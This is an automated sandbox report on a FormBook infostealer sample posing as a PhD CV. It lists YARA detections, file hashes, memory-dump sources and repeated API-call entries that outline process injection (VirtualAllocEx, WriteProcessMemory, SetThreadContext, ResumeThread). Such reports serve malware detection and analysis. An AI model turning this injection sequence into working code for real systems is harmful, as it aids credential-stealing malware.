                                                                                                Commandline:"C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe"
                                                                                                Imagebase:0xa80000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:6
                                                                                                Start time:11:01:05
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                Imagebase:0x7ff66d3e0000
                                                                                                File size:597'432 bytes
                                                                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.6%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:2.7%
                                                                                                  Total number of Nodes:226
                                                                                                  Total number of Limit Nodes:5

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: :$~
                                                                                                  • API String ID: 0-2431124681
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd

                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07889326
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0

                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07889326
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 019BB71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0

                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0

                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019B59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0

                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019B59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0

                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05F26BC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0

                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0

                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07888EF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0

                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07888EF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 376 7888f50-7888fe5 ReadProcessMemory 380 7888fee-788901e 376->380 381 7888fe7-7888fed 376->381 381->380
                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07888FD8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 385 19bd518-19bda3c DuplicateHandle 387 19bda3e-19bda44 385->387 388 19bda45-19bda62 385->388 387->388
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019BD96E,?,?,?,?,?), ref: 019BDA2F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 391 19bd9a3 392 19bd9a8-19bda3c DuplicateHandle 391->392 393 19bda3e-19bda44 392->393 394 19bda45-19bda62 392->394 393->394
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019BD96E,?,?,?,?,?), ref: 019BDA2F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07888FD8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1726664587-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 397 7888cc8-7888d1b 399 7888d2b-7888d5b Wow64SetThreadContext 397->399 400 7888d1d-7888d29 397->400 402 7888d5d-7888d63 399->402 403 7888d64-7888d94 399->403 400->399 402->403
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07888D4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07888D4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  APIs
                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 019BA0AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 134000473-0
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07888E16
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  APIs
                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 019BA0AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 134000473-0
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07888E16
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05F26BC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 019BB71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ed6450443d3a0a5c7851a7d69f0fa54def26ac0bab5ee129443964f39b8329b3
                                                                                                  • Instruction ID: 8f7511deb29ebf2bb4fb5cfaa882d464a766135a288f4e008694240d612f424f
                                                                                                  • Opcode Fuzzy Hash: ed6450443d3a0a5c7851a7d69f0fa54def26ac0bab5ee129443964f39b8329b3
                                                                                                  • Instruction Fuzzy Hash: 1671169280E3E55FE35B6A7898A83D53F708F53125F0A01DBC094CE1A3DA5C894AC36B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ef5b98011e743fa6df92b964b2bcd0a10572b255b82423f1b66051c920353297
                                                                                                  • Instruction ID: 097a8b1f7c2e01f84b8938f65d8fb7c04383e4b23cab233e5c98e6c1b1cf6285
                                                                                                  • Opcode Fuzzy Hash: ef5b98011e743fa6df92b964b2bcd0a10572b255b82423f1b66051c920353297
                                                                                                  • Instruction Fuzzy Hash: FC5130B4E002598FDB14DFA9C540AAEFBF2FF89304F24826AD418AB356D7355941CF61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 14142171a06f1aef9eba199632251515b79f1b67f29f11ee20c681278055c725
                                                                                                  • Instruction ID: f852b4f6902ed678895cc916cb4629be2e66ebfd106f96637a956c77a2c1c580
                                                                                                  • Opcode Fuzzy Hash: 14142171a06f1aef9eba199632251515b79f1b67f29f11ee20c681278055c725
                                                                                                  • Instruction Fuzzy Hash: DB512CB0E002198FDB14DFA9C5846AEFBF2FF89304F24816AD418A7316DB319941CFA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7e0167ba3a730e9e2645047115436f8bcbc1df977a802b359ac794be48576a61
                                                                                                  • Instruction ID: 359b8a776f879154ef292af4f82020f4a5c7195b90a94bc2ba6c0cfbb9520b84
                                                                                                  • Opcode Fuzzy Hash: 7e0167ba3a730e9e2645047115436f8bcbc1df977a802b359ac794be48576a61
                                                                                                  • Instruction Fuzzy Hash: F7419BB1E016289BEB18CF6ACD4079EFAF3AFC9300F14C5A9D509A7254EB3459858F51

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:5.1%
                                                                                                  Signature Coverage:8%
                                                                                                  Total number of Nodes:137
                                                                                                  Total number of Limit Nodes:9

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 96 417943-41796c call 42f323 99 417972-417980 call 42f923 96->99 100 41796e-417971 96->100 103 417990-4179a1 call 42ddd3 99->103 104 417982-41798d call 42fbc3 99->104 109 4179a3-4179b7 LdrLoadDll 103->109 110 4179ba-4179bd 103->110 104->103 109->110
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179B5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 121 42c6b3-42c6ec call 404813 call 42d8f3 NtClose
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C6E7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 135 f82a80-f82a8c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 136 f82b90-f82b9c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 137 f82d10-f82d1c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 138 f834e0-f834ec LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 0 4140d3-4140eb 1 414110-414112 0->1 2 4140ee-4140f0 0->2 3 414114-414120 1->3 4 41412f-414138 1->4 2->1 5 4141a2 4->5 6 41413a-414142 4->6 9 4141a4 5->9 7 414144-414163 6->7 8 4140cd-4140d0 6->8 10 414125-414129 7->10 11 414165-414170 7->11 12 41408a-41409f call 413c93 8->12 13 4141a6-4141d2 9->13 10->9 14 41412b-41412c 10->14 15 414175-414180 11->15 27 4140a1-4140b6 call 413d23 12->27 28 414023-41405d call 42e793 call 42eda3 call 424f23 12->28 17 4141f4 13->17 18 4141d4-4141d5 13->18 14->13 19 41412e 14->19 21 414182-414184 15->21 22 414185 15->22 20 4141f5-41422f 17->20 18->20 24 4141d7-4141ee 18->24 19->4 25 414231-414236 20->25 26 414239-41423c 20->26 21->22 22->5 24->15 29 4141f1-4141f3 24->29 25->26 30 4142b3-4142ea call 417943 call 404783 call 424f83 26->30 31 41423e-41424c 26->31 28->12 46 41405f-414065 28->46 29->17 50 41430a-414310 30->50 51 4142ec-4142fb PostThreadMessageW 30->51 48 4140b7-4140ba 46->48 49 414067-414088 call 428543 46->49 48->12 54 4140bc-4140c7 48->54 49->12 49->27 51->50 53 4142fd-414307 51->53 53->50 54->8 55 4140c8 call 42a003 54->55 55->8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
